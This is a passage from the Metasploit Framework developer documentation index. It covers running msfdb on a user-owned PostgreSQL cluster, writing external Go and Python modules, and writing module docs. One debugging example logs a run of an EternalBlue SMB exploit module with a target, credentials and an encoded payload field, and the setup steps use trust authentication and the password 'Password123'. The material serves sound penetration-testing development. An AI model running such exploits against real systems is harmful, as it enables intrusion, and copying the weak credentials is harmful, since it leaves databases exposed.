    "content": "Requirements . | Determine if the system is using postgresql-common. | Ideally, allow a user without elevated privileges to set up a database for use with Metasploit. | Determine the current version of PostgreSQL on the system when multiple versions might be installed in parallel. | The port number used for the server when pg_createcluster is run without a port number option defaults to the “next free port starting from 5432”. If we don’t specify the port number when calling pg_createcluster, we can scrape the port number from the pg_lsclusters output. | . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters --no-header | awk '/^9.6/ { if ($2 == \"msf\") { print $3; } }' 5433 . Notes . Debian’s postgresql-common (Multi-Version/Multi-Cluster PostgreSQL architecture) contains PostgreSQL wrapper tools: . | pg_lsclusters: list all available clusters with their status and configuration | pg_createcluster: wrapper for initdb, sets up the necessary configuration structure . | pg_createcluster [options] version name [-- initdb options] | . | pg_ctlcluster: wrapper for pg_ctl, controls the cluster’s postgres server . | pg_ctlcluster [options] cluster-version cluster-name action -- [pg_ctl options] | where action is one of start, stop, restart, reload, promote | . | pg_dropcluster: remove a cluster and its configuration . | pg_dropcluster [--stop] cluster-version cluster-name | . | pg_wrapper: wrapper for PostgreSQL client commands . | client-program [--cluster version/cluster] […] | ( client-program: psql, createdb, dropuser, and all other client programs installed in /usr/lib/postgresql/version/bin). | . | . The “database cluster” simply refers to a set of databases on a single server rather than a group of multiple database servers. Manually create and initialize the MSF database using postgresql-common . Issues . Encountered permissions issues when attempting to create a cluster. 
pg_createcluster --user=$(whoami) --encoding=UTF8 9.6 msf -- --username=$(whoami) --auth-host=trust --auth-local=trust install: cannot change permissions of '/etc/postgresql/9.6/msf': No such file or directory Error: could not create configuration directory; you might need to run this program with root privileges . Requiring root privileges may be prohibitive to user installs of MSF. How can we create a cluster without root privileges? Adding the user to the postgres group and attempting to sudo -u postgres the command, however, resulted in the same error message. Looking closer at the various commands, I discovered the following in the man page for pg_wrapper. PG_CLUSTER_CONF_ROOT This specifies an alternative base directory for cluster configurations. This is usually /etc/postgresql/, but for testing/development purposes you can change this to point to e.g. your home directory, so that you can use the postgresql-common tools without root privileges. Working Solution . Create the cluster (“initdb”) to set up the necessary configuration structure: . Note, running mkdir -p $HOME/.local/etc/postgresql; before the pg_createcluster command didn’t stop the “install: cannot change owner and permissions of ‘/home/msfdev/.local/etc/postgresql/9.6’: Operation not permitted” message from appearing. This appears to be a warning only and doesn’t seem to affect cluster creation. mkdir -p $HOME/.local/var/log/postgresql; PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_createcluster --user=$(whoami) --datadir=$HOME/msf-db-datadir --socketdir=$HOME/.local/var/run/postgresql --logfile=$HOME/.local/var/log/postgresql/postgresql-version-msf.log --encoding=UTF8 9.6 msf -- --username=$(whoami) --auth-host=trust --auth-local=trust install: cannot change owner and permissions of '/home/msfdev/.local/etc/postgresql/9.6': Operation not permitted Creating new cluster 9.6/msf ... 
config /home/msfdev/.local/etc/postgresql/9.6/msf data /home/msfdev/msf-db-datadir locale en_US.UTF-8 socket /home/msfdev/.local/var/run/postgresql port 5433 . Check cluster was successfully created and appears in the list of all available clusters: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters Ver Cluster Port Status Owner Data directory Log file 9.6 msf 5433 down msfdev /home/msfdev/msf-db-datadir /home/msfdev/.local/var/log/postgresql/postgresql-version-msf.log . Start postmaster server for the cluster (“pg_ctl”): . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_ctlcluster 9.6 msf start . Check that the cluster was successfully started: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters Ver Cluster Port Status Owner Data directory Log file 9.6 msf 5433 online msfdev /home/msfdev/msf-db-datadir /home/msfdev/.local/var/log/postgresql/postgresql-version-msf.log . Perform msfdb’s write_db_config method work by manually creating the ~/.msf4/database.yml file: . development: &amp;amp;pgsql adapter: postgresql database: msf username: msf password: Password123 host: 127.0.0.1 port: 5433 pool: 200 production: &amp;amp;production &amp;lt;&amp;lt;: *pgsql test: &amp;lt;&amp;lt;: *pgsql database: msftest username: msftest password: Password123 . Create database users: . Note, these steps are from msfdb’s init_db method. The following example only creates the main MSF user account and not the test account. 
PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql psql --cluster 9.6/msf -c \"create user msf with password 'Password123';\" postgres CREATE ROLE PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql psql --cluster 9.6/msf -c \"alter role msf createdb;\" postgres ALTER ROLE PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql psql --cluster 9.6/msf -c \"alter role msf with password 'Password123';\" postgres ALTER ROLE PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql createdb --cluster 9.6/msf -O msf -h 127.0.0.1 -U msf -E UTF-8 -T template0 msf . Perform msfdb’s write_db_client_auth_config method work, except it needs to write the pg_hba.conf file now stored under PG_CLUSTER_CONF_ROOT inside the version/cluster-name directory. In this example that location is: $HOME/.local/etc/postgresql/9.6/msf/pg_hba.conf. Perform msfdb’s restart_db method work by stopping and then starting the server. Stop and then start the postmaster server for the cluster (“pg_ctl”): . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_ctlcluster 9.6 msf stop PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_ctlcluster 9.6 msf start . Check that the cluster was successfully started: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_lsclusters Ver Cluster Port Status Owner Data directory Log file 9.6 msf 5433 online msfdev /home/msfdev/msf-db-datadir /home/msfdev/.local/var/log/postgresql/postgresql-version-msf.log . Create the initial database schema: . Note, these steps are from msfdb’s init_db method. cd ~/metasploit-framework bundle exec rake db:migrate . Start msfconsole and verify the PostgreSQL connection using the db_status command: . # disable or remove ~/.msf4/config if it is configured to auto connect to a data service mv ~/.msf4/config ~/.msf4/config.disable ./msfconsole ... msf5 &amp;gt; db_status [*] Connected to msf. Connection type: postgresql. Drop (delete) the cluster: . PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf . ",
    "url": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#msfdb-support-for-postgresql-common",
    "relUrl": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#msfdb-support-for-postgresql-common"
  },"849": {
    "doc": "Work needed to allow msfdb to use postgresql common",
    "title": "Work needed to allow msfdb to use postgresql common",
    "content": " ",
    "url": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html",
    "relUrl": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html"
  },"850": {
    "doc": "Writing GoLang Modules",
    "title": "Writing GoLang Modules",
    "content": "Contributing modules in Go can be achieved in a few simple steps as outlined below. As for the supported Go version, we have tested with 1.11.2; no promises for version 2. 1. Location . | Select the appropriate module path based on the type of module you are trying to contribute | Be sure to include appropriate module documentation under here | Test that your documentation is correct by executing info -d | . 2. Execution . | Include this line at the top of your module: //usr/bin/env go run \"$0\" \"$@\"; exit \"$?\" | Ensure your file is an executable file | . 3. Setup . | Initialize your module with the module metadata: import \"metasploit/module\" func main() { metadata := &amp;amp;module.Metadata{ Name: \"&amp;lt;module name&amp;gt;\", Description: \"&amp;lt;describe&amp;gt;\", Authors: []string{\"&amp;lt;author 1&amp;gt;\", \"&amp;lt;author 2&amp;gt;\"}, Date: \"&amp;lt;date module written&amp;gt;\", Type:\"&amp;lt;module type&amp;gt;\", Privileged: &amp;lt;true|false&amp;gt;, References: []module.Reference{}, Options: map[string]module.Option{ \"&amp;lt;option 1&amp;gt;\": {Type: \"&amp;lt;type&amp;gt;\", Description: \"&amp;lt;description&amp;gt;\", Required: &amp;lt;true|false&amp;gt;, Default: \"&amp;lt;default&amp;gt;\"}, \"&amp;lt;option 2&amp;gt;\": {Type: \"&amp;lt;type&amp;gt;\", Description: \"&amp;lt;description&amp;gt;\", Required: &amp;lt;true|false&amp;gt;, Default: \"&amp;lt;default&amp;gt;\"}, }} module.Init(metadata, &amp;lt;the entry method to your module&amp;gt;) } . | . FULL EXAMPLE . Note: the above does not outline the full list of available metadata options . Currently supported module types: . | remote_exploit | remote_exploit_cmd_stager | capture_server | dos | single_scanner | single_host_login_scanner | multi_scanner | . 4. Shared Code . 
| For shared code that is specific to your module, create a directory in your module directory: shared/src/. Metasploit will automatically add these to the GOPATH | For code that you think could be used across modules, add it here | 3rd-party libs aren’t currently supported, but we welcome patches | . 5. Finalize . | Test your Pull Request | Create a Pull Request | No coding standard here, but be sure to run gofmt | . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-golang-modules.html",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-golang-modules.html"
  },"851": {
    "doc": "Overview",
    "title": "Request Flow",
    "content": "Each time Metasploit wants an external module to do something (ex. describe itself or run with a certain configuration), it runs the module in a new process and talks to it over stdin/stdout. To get the metadata from a module (which includes options), the call sequence looks a bit like: . +------------+ | Metasploit | | Describe yourself +-------------------+ | +-------------------&amp;gt; | some_module.py | | | | | | Some metadata | | &amp;lt;-------------------+ | | | | +-------------------+ | | +------------+ . A module run might look like: . +------------+ | Metasploit | Do a thing with | these options +-------------------+ | +-------------------&amp;gt; | some_module.py | | | | | | A bit of status | | &amp;lt;-------------------+ | | | | Moar status | | &amp;lt;-------------------+ | | | | I found a thing | | &amp;lt;-------------------+ | | | | +-------------------+ | +------------+ . When a module meant for a single host is run against a range of hosts, Metasploit will start a new process for each host. If the THREADS datastore option is set and it is an auxiliary module, that many processes will be run at the same time. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#request-flow",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#request-flow"
  },"852": {
    "doc": "Overview",
    "title": "JSON-RPC API",
    "content": "External modules communicate with Metasploit over stdin/stdout. The methods a module must implement are describe and run; additional methods can be advertised in the capabilities array, for now assumed to use a subset of the options used for run. Metasploit implements message and will implement report in the near future. The specs for each method are written below using JSON-schema. Work still needs to be done enumerating valid types and codes for the messages. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#json-rpc-api",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#json-rpc-api"
  },"853": {
    "doc": "Overview",
    "title": "Describe",
    "content": "Request . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"params\", \"method\", \"jsonrpc\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"method\": {\"enum\": [\"describe\"]}, \"params\": {\"type\": \"object\"} } } . Response . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"jsonrpc\", \"result\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"result\": { \"type\": \"object\", \"required\": [\"name\", \"description\", \"authors\", \"type\", \"options\", \"capabilities\"], \"properties\": { \"name\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\"}, \"authors\": {\"type\": \"array\", \"items\": {\"type\": \"string\"}}, \"date\": {\"type\": \"string\"}, \"references\": { \"type\": \"array\", \"items\": { \"type\": \"object\", \"required\": [\"type\", \"ref\"], \"properties\": { \"type\": {\"type\": \"string\"}, \"ref\": {\"type\": \"string\"} } } }, \"type\": {\"enum\": [\"remote_exploit.cmd_stager.wget\"]}, \"privileged\": {\"type\": \"boolean\"}, \"targets\": { \"type\": \"array\", \"items\": { \"type\": \"object\", \"required\": [\"platform\", \"arch\"], \"properties\": { \"platform\": {\"type\": \"string\"}, \"arch\": {\"type\": \"string\"} } } }, \"options\": { \"type\": \"object\", \"additionalProperties\": false, \"patternProperties\": { \"^[^=]*$\": { \"type\": \"object\", \"required\": [\"type\", \"description\", \"required\", \"default\"], \"properties\": { \"required\": {\"type\": \"boolean\"}, \"default\": {\"type\": [\"null\", \"string\", \"number\", \"boolean\", \"object\", \"array\"]}, \"description\": {\"type\": \"string\"}, \"type\": {\"type\": \"string\"} } } } }, \"capabilities\": { \"type\": \"array\", \"items\": { \"type\": \"string\" } } } } } } . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#describe",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#describe"
  },"854": {
    "doc": "Overview",
    "title": "Run",
    "content": "Request . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"params\", \"method\", \"jsonrpc\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"method\": {\"enum\": [\"run\"]}, \"params\": { \"type\": \"object\", \"additionalProperties\": false, \"patternProperties\": { \"^[^=]*$\": { \"type\": \"object\", \"required\": [\"type\", \"description\", \"required\", \"default\"], \"properties\": { \"required\": {\"type\": \"boolean\"}, \"default\": {\"type\": [\"null\", \"string\", \"number\", \"boolean\", \"object\", \"array\"]}, \"description\": {\"type\": \"string\"}, \"type\": {\"type\": \"string\"} } } } } } } . Response . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"jsonrpc\", \"id\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"id\": {\"type\": \"string\"}, \"result\": { \"type\": \"object\", \"required\": [\"message\"], \"properties\": { \"message\": {\"type\": \"string\"}, \"return\": {\"type\": \"string\"} } }, \"error\": { \"type\": \"object\", \"required\": [\"message\", \"code\"], \"properties\": { \"message\": {\"type\": \"string\"}, \"code\": {\"type\": \"number\"}, \"data\": {\"type\": \"object\"} } } } } . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#run",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#run"
  },"855": {
    "doc": "Overview",
    "title": "Message",
    "content": "Notification - no response . { \"$schema\": \"http://json-schema.org/schema#\", \"type\": \"object\", \"required\": [\"params\", \"method\", \"jsonrpc\"], \"properties\": { \"jsonrpc\": {\"enum\": [\"2.0\"]}, \"method\": {\"enum\": [\"message\"]}, \"params\": { \"type\": \"object\", \"required\": [\"level\", \"message\"], \"properties\": { \"level\": {\"enum\": [\"error\", \"good\", \"warning\", \"info\", \"debug\"]}, \"message\": {\"type\": \"string\"} } } } } . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#message",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html#message"
  },"856": {
    "doc": "Overview",
    "title": "Overview",
    "content": "For an introduction to the reasons and goals for external modules, see our 2017 HaXmas post on the subject. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-metasploit-modules.html"
  },"857": {
    "doc": "Writing Python Modules",
    "title": "Writing Python Modules for Metasploit",
    "content": "This is an example of how to write a Python module for Metasploit Framework that uses a Python metasploit library to communicate with framework via JSON-RPC over stdin/stdout. External Python modules should support Python versions 3.5 and newer. Python 2.7 is no longer used for external modules. Execution . | Include this line at the top of your module: #!/usr/bin/env python3 | Ensure your file is marked as executable | . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#writing-python-modules-for-metasploit",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#writing-python-modules-for-metasploit"
  },"858": {
    "doc": "Writing Python Modules",
    "title": "Python Library",
    "content": "The library currently supports a few function calls that can be used to report information to Metasploit Framework. The metasploit library can be loaded into your Python module by including the following line: . from metasploit import module . The location of the metasploit library is automatically added to the PYTHONPATH environment variable before the Python module is executed. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#python-library",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#python-library"
  },"859": {
    "doc": "Writing Python Modules",
    "title": "Describe Yourself",
    "content": "Metasploit modules include information about the authors of the modules, references to other sources with information about the vulnerabilities, descriptions of the modules, options, etc. Python modules need to include this metadata information as well. The structure of the data is similar to modules written in Ruby. The following is an example template of metadata information: . metadata = { 'name': '&amp;lt;name&amp;gt;', 'description': ''' &amp;lt;description&amp;gt; ''', 'authors': [ '&amp;lt;author&amp;gt;', '&amp;lt;author&amp;gt;' ], 'date': 'YYYY-MM-DD', 'license': '&amp;lt;license&amp;gt;', 'references': [ {'type': 'url', 'ref': '&amp;lt;url&amp;gt;'}, {'type': 'cve', 'ref': 'YYYY-#'}, {'type': 'edb', 'ref': '#'}, {'type': 'aka', 'ref': '&amp;lt;name&amp;gt;'} ], 'type': '&amp;lt;module type&amp;gt;', 'options': { '&amp;lt;name&amp;gt;': {'type': 'address', 'description': '&amp;lt;description&amp;gt;', 'required': &amp;lt;True/False&amp;gt;, 'default': None}, '&amp;lt;name&amp;gt;': {'type': 'string', 'description': '&amp;lt;description&amp;gt;', 'required': &amp;lt;True/False&amp;gt;, 'default': None}, '&amp;lt;name&amp;gt;': {'type': 'string', 'description': '&amp;lt;description&amp;gt;', 'required': &amp;lt;True/False&amp;gt;, 'default': None} } } . Module Type . As shown in the metadata template, a type is also included for the module. The module type is used to select an ERB template, which generates a Ruby document for the module. The ERB templates can be found here. The following templates are currently available: . remote_exploit_cmd_stager capture_server dos single_scanner multi_scanner . The remote_exploit_cmd_stager module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the flavor specified for the command stager. 
The capture_server module type is used when a module is designed to simulate a service to capture credentials for connecting clients. The dos module type is used when the module will send packets to a remote service that will crash the service or put it in an unusable state. The single_scanner module type is used when creating a module to scan hosts without batching. The multi_scanner module type is used for modules that are going to scan hosts in batches. The batch_size option is registered in the mutli_scanner ERB template with a default of 200. Options . The options dictionary in the metadata are the options that will be available in msfconsole when the module is loaded. The options can be required (necessary for the module to run) or not (provide additional functionality). Communication . To pass the metadata information, as well as the starting function of your Python module, to msfconsole, use the module.run() function. The module.run() function takes two arguments, the first is the metadata and the second is the callback function to use when executing the module from msfconsole. The code snippet will look like the following: . def run(args): # Your code here pass if __name__ == '__main__': module.run(metadata, run) . When msfconsole sends a describe request to the Python module, the metadata information is returned. When msfconsole sends a run request to the module, the callback function, run in this example, will be called with the arguments provided to msfconsole. A LogHandler can be setup and used to communicate status information back to framework during execution of the Python module. Here is code snippet that uses the LogHandler: . import logging from metasploit import module module.LogHandler.setup(msg_prefix='logging test: ') logging.info('info') logging.error('error') logging.warning('warning') logging.debug('debug') . 
The module.LogHandler.setup() function is used the create a Handler and Formatter that will call module.log() with the appropriate log level. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#describe-yourself",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#describe-yourself"
  },"860": {
    "doc": "Writing Python Modules",
    "title": "Full Example",
    "content": "#!/usr/bin/env python3 # -*- coding: utf-8 -*- # standard modules import logging # extra modules dependencies_missing = False try: import requests except ImportError: dependencies_missing = True from metasploit import module metadata = { 'name': 'Python Module Example', 'description': ''' Python communication with msfconsole. ''', 'authors': [ 'Jacob Robles' ], 'date': '2018-03-22', 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://blog.rapid7.com/2017/12/28/regifting-python-in-metasploit/'}, {'type': 'aka', 'ref': 'Coldstone'} ], 'type': 'single_scanner', 'options': { 'targeturi': {'type': 'string', 'description': 'The base path', 'required': True, 'default': '/'}, 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None} } } def run(args): module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) if dependencies_missing: logging.error('Module dependency (requests) is missing, cannot continue') return # Your code here try: r = requests.get('https://{}/{}'.format(args['rhost'], args['targeturi']), verify=False) except requests.exceptions.RequestException as e: logging.error('{}'.format(e)) return logging.info('{}...'.format(r.text[0:50])) if __name__ == '__main__': module.run(metadata, run) . The example sends a GET request to the given rhost and targeturi, then calls logging.info() on the result to have the output displayed in msfconsole. Debugging Python modules . If you want to run an external module as a standalone program from your metasploit-framework folder, just specify the Python path to include the Metasploit library support and run the module directly: . $ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py . The Python module will wait for stdin to receive JSON-RPC input. Entering the request to run the module: . 
{ \"jsonrpc\": \"2.0\", \"id\": \"1337\", \"method\": \"run\", \"params\": { \"rhosts\": [\"127.0.0.1\"], \"rport\": \"49152\" } } . You will see the JSON-RPC responses printed to stdout: . {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"debug\", \"message\": \"127.0.0.1:49152 - Connected\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"debug\", \"message\": \"127.0.0.1:49152 - Received 5 bytes\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"127.0.0.1:49152 - Does not match\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"debug\", \"message\": \"127.0.0.1:49152 - Does not match with: bytearray(b'xxxxx')\"}} . You can pipe the JSON-RPC request as well for automation purposes: . echo '{ \"jsonrpc\": \"2.0\", \"id\": \"1337\", \"method\": \"run\", \"params\": { \"rhosts\": [\"127.0.0.1\"], \"rport\": \"49152\" } }' | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py . The Python external modules can be run directly with command line options: . $ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3.9 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --help usage: att_open_proxy.py [-h] --rhosts RHOSTS [--rport RPORT] [ACTION] The Arris NVG589 and NVG599 routers configured with AT&amp;amp;T U-verse firmware 9.2.2h0d83 expose an un-authenticated proxy that allows connecting from WAN to LAN by MAC address. positional arguments: ACTION The action to take (['run']) optional arguments: -h, --help show this help message and exit --rport RPORT The target port, (default: 49152) required arguments: --rhosts RHOSTS The target address . For example: . PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --rhosts 127.0.0.1 --rport 49152 . 
For exploit modules, the payload is encoded using Base64 and specified in a top level payload_encoded key, implemented here. Below is an example of the (now deleted) ms17_010_eternalblue_win8.py module running: . $ cat options.json { \"jsonrpc\": \"2.0\", \"id\": \"1337\", \"method\": \"run\", \"params\": { \"VERBOSE\": true, \"RHOST\": \"192.168.144.131\", \"RPORT\": \"445\", \"GroomAllocations\": 13, \"ProcessName\": \"spoolsv.exe\", \"SMBUser\": \"test\", \"SMBPass\": \"123456\", \"payload_encoded\": \"/EiD5PDozAAA...etc...===\" } } $ cat options.json | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 modules/exploits/windows/smb/ms17_010_eternalblue_win8.py {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"shellcode size: 1221\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"numGroomConn: 13\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"Target OS: Windows 10 Pro 10240\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"got good NT Trans response\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"got good NT Trans response\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"SMB1 session setup allocate nonpaged pool success\"}} {\"jsonrpc\": \"2.0\", \"method\": \"message\", \"params\": {\"level\": \"info\", \"message\": \"SMB1 session setup allocate nonpaged pool success\"}} . To add breakpoints to your Python code, add the below code snippet. Note that the interactive breakpoints will only work when running the external modules as standalone Python scripts, and won’t work when running from msfconsole: . import pdb; pdb.set_trace() . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#full-example",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#full-example"
  },"861": {
    "doc": "Writing Python Modules",
    "title": "Coding with Style",
    "content": "All the Python code in Metasploit aims to be PEP 8 compliant. The biggest differences coming from Metasploit’s Ruby style: . | Two lines between functions (but not class methods) | Two lines between different types of code (like imports and the metadata, see above) | Four spaces for indenting | . Some coding choices to think about when writing your module: . | Prefer \"foo {}\".format('bar') over interpolation with % | Keep your callback methods short and readable. If it gets cluttered, break out sub-tasks into well-named functions | Variable names should be descriptive, readable, and short (a guide) | If you really need Python3 features in your module, use #!/usr/bin/env python3 for the shebang | If you have a lot of legacy code in 2.7 or need a 2.7 library, use #!/usr/bin/env python2.7 (macOS in particular does not ship with a python2 executable by default) | If possible, have your module compatible with both and use #!/usr/bin/env python | . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#coding-with-style",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#coding-with-style"
  },"862": {
    "doc": "Writing Python Modules",
    "title": "(Potentially) Common Questions",
    "content": "Why doesn’t the module appear when I search for it in msfconsole? . The module may have errors and fail to load inside of msfconsole. Check the framework log file, ~/.msf4/logs/framework.log, for error messages. Also, if the module is not marked as executable, then it will not show up when you search for it in msfconsole. Why is the output from the Python module not showing up in msfconsole? . The external modules communicate with framework via JSON-RPC. If your Python module contains print statements, framework may not recognize those as JSON-RPC requests. Use the LogHandler or module.log() to send status information, which will be displayed in msfconsole. ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#potentially-common-questions",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#potentially-common-questions"
  },"863": {
    "doc": "Writing Python Modules",
    "title": "Additional Resources",
    "content": "Rapid7 Blog: Regifting Python in Metasploit . Rapid7 Blog: External Metasploit Modules: The Gift That Keeps On Slithering . Metasploit Python library . ERB Templates . ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#additional-resources",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html#additional-resources"
  },"864": {
    "doc": "Writing Python Modules",
    "title": "Writing Python Modules",
    "content": " ",
    "url": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html",
    "relUrl": "/docs/development/developing-modules/external-modules/writing-external-python-modules.html"
  },"865": {
    "doc": "Writing Module Documentation",
    "title": "Writing Module Documentation",
    "content": "Adding and reviewing module documentation is a great way to contribute to the Metasploit Framework. Before you write any module documentation, you should take a look at the sample template, module_doc_template.md, or take a look at any of the KBs that are already available. Writing a KB . To write a KB, you’ll need to: . | Create a markdown (.md) file. | Write the content. | Save the file and name it after the module name. For example, the filename for ms08-067 is modules/exploits/windows/smb/ms08_067_netapi.rb, so its documentation is documentation/modules/exploits/windows/smb/ms08_067_netapi.md. | Place it in the metasploit-framework/documentation/modules directory. | . Where to put the markdown files . If you go to metasploit-framework/documentation/modules, you’ll see that there are documentation directories for each module type: auxiliary, exploit, payload, and post. To figure out where you need to put the file, you’ll need to look at the module’s path. | Start msfconsole. | Type use &amp;lt;module name&amp;gt;. | Type info -d. | When the module name appears, look at the Module field. You’ll see a file path for the module. That’s the path where the KB needs to be added. | . For example: . msf&amp;gt; use auxiliary/scanner/smb/smb_login msf (smb_login)&amp;gt; info Name: SMB Login Check Scanner Module: auxiliary/scanner/smb/smb_login .... If you were creating a KB for the smb login scanner, you’d add it to metasploit-framework/documentation/modules/auxiliary/smb.md. Sections you should include in the KB . These are just suggestions, but it’d be nice if the KB had these sections: . | Vulnerable Applications - Tells users what targets are vulnerable to the module and provides instructions on how to access vulnerable targets for testing. | Verification Steps - Tells users how to use the module and what the expected results are from running the module. | Options - Provides descriptions of all the options that can be run with the module. 
Additionally, clearly identify the options that are required. | Scenarios - Provides sample usage and describes caveats that the user may need to be aware of when running the module. | . Before you submit your PR: msftidy_docs.rb . A documentation file can be passed as a positional argument to metasploit-framework/tools/dev/msftidy_docs.rb and will highlight formatting errors the docs file might contain. Once all the errors and warnings thrown by msftidy_docs.rb have been resolved, the documentation file is ready for submission. ➜ metasploit-framework git:(upstream-master) ✗ ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/panos_op_cmd_exec.md documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [INFO] Missing Section: ## Options documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] Please add a newline at the end of the file documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps/Module usage, Options, Scenarios documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:50 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```) documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:53 - [WARNING] Spaces at EOL . ",
    "url": "/docs/development/quality/writing-module-documentation.html",
    "relUrl": "/docs/development/quality/writing-module-documentation.html"
  }
}
</pre></body></html>